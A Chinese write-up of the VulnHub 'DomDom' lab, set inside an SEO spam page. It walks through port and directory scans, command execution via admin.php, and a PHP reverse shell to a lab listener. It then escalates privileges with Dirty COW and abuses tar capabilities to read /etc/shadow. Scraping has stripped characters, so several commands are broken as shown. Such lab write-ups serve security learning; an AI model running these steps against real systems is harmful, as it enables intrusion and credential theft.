当前位置: 首页 > news >正文

好的网站特点推广联盟平台

好的网站特点,推广联盟平台,企业展厅布展设计公司,佛山高端外贸网站建设靶场下载地址#xff1a; https://www.vulnhub.com/entry/domdom-1,328/ 一、信息收集 获取主机ip nmap -sP 192.168.16.0/24netdiscover -r 192.168.16.0/24端口版本获取 nmap -sV -sC -A -p 1-65535 192.168.16.209开放端口只有80 目录扫描 这里扫描php后缀的文件 g…靶场下载地址 https://www.vulnhub.com/entry/domdom-1,328/ 一、信息收集 获取主机ip nmap -sP 192.168.16.0/24netdiscover -r 192.168.16.0/24端口版本获取 nmap -sV -sC -A -p 1-65535 192.168.16.209开放端口只有80 目录扫描 这里扫描php后缀的文件 gobuster dir -u http://192.168.16.209 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php这里扫描出两个目录一个/index.php,一个 /admin.php. 二、RCE漏洞利用 查看登录的网站 抓包 使用burpsuite抓取登录后的包 把index.php更改为admin.php,发现存在cmd执行 参数更改 nameadusernameadpasswordadaccessaccesscmdls命令被成功执行 nc反弹 1.开启监听 nc -lvnp 90022.反弹shell 这里使用python的shell php -r $sockfsockopen(192.168.16.180,9002);exec(/bin/sh -i 3 3 23);进行加密后执行 会话获取成功 切换bash python3 -c import pty;pty.spawn(/bin/bash)这里推荐一个 https://www.revshells.com/ 网站生成反弹shell网站 三、方法一、脏牛提权 获取版本 uname -a得到系统版本为Linux ubuntu 4.4.0-21-generic 漏洞检测 漏洞检测脚本进行检测 https://github.com/mzet-/linux-exploit-suggester 下载到kali 使用 python -m http.server或者直接 wget https://github.com/The-Z-Labs/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh 添加上执行权限 chomd x linux-exploit-suggester.sh执行 脏牛漏洞利用 exp下载wget https://www.exploit-db.com/download/40616 编译这里编译会报错不用管 gcc exp.c -o exp -pthread添加执行权限 chmod x exp运行提权成功 四、方法二、密码登陆提权 Linux系统利用可执行文件的Capabilities实现权限提升 - FreeBuf网络安全行业门户 Capabilities机制是在Linux内核2.2之后引入的原理很简单就是将之前与超级用户rootUID0关联的特权细分为不同的功能组 “Capabilities”能力机制是一种计算机安全模型用于限制一个进程或用户在操作系统中能够执行的特定操作。它基于原则即每个主体进程或用户只被授予执行特定操作所需的最低权限。 1.现在假设管理员对一些可执行文件设置了capabilities。测试人员通过下面的命令查找这些文件 getcap -r / 2/dev/null2.Linux内核中Capabilities的实现机制对比 linux Capabilities简介–#setcap cap_net_raw,cap_net_admineip /a.out | (moonsec.com) 这里tar命令可以绕过文件的读权限检查以及目录的读/执行权限的检查。 /bin/tar cap_dac_read_searchep利用此特性我们可以读取系统中的敏感信息。 tar cvf shadow.tar /etc/shadow //创建压缩文件tar -xvf shadow.tar //解压缩chmod r shadow //赋予读权限cat shadow | grep root //查看shadow文件的内容读取了/etc/shadow文件的内容 这里 tar -cvf domom.tar /home/domom #打包home下的目录解压 tar -xvf domom.tar切换目录到桌面 ls 发现有个README.md查看最后得到密码Mj7AGmPR-mVfRy{}LJRBS5nc*V.#a登录成功
http://www.dnsts.com.cn/news/1906.html

相关文章:

  • 电子商务网站管理内容seo招聘网
  • 有哪些做分析图用的网站网络推广宣传方式
  • 网站支付平台是怎么做的北京度seo排名
  • 如何用api做网站厦门seo报价
  • 淄博网站建设电话咨询百度pc版网页
  • 素材网站建设需要多少费用谷歌浏览器网页版在线
  • 网站建设方案案例seo整站优化新站快速排名
  • 学做网站设计需要多少钱百度关键词排名优化工具
  • 网站全新改版如何做成都私人网站制作
  • 做网站哪个行业比较有前景做营销策划的公司
  • 温州网站建设方案报价竞价推广培训课程
  • 上海网站建设与设计公司如何做互联网营销推广
  • 长城宽带seowhy论坛
  • 江门建站网站模板有什么引流客源的软件
  • 信阳做网站的公司官网排名优化方案
  • 外国做视频在线观看网站百度优化怎么做
  • 织梦网站源码下载学seo哪个培训好
  • 网站开发技术教程百度指数行业排行
  • 免费响应式模板网站模板申请域名
  • 中国建设银行招投标网站郑州企业网站seo
  • 可以做自己的单机网站种子搜索神器在线搜
  • 记事本做网站怎么调整图片间距希爱力的功效及副作用
  • 网络科技公司注册网站优化外包费用
  • 滕州网站搜索引擎优化网页开发公司
  • 网站建设成本预算百度在线入口
  • 门户网站推广介绍方案竞价交易
  • 做充值网站网站优化公司认准乐云seo
  • 比特币网站怎么做网站权重查询工具
  • 网站建设昆明广州百度快速优化排名
  • 平台类网站建设价格表关键词歌词简谱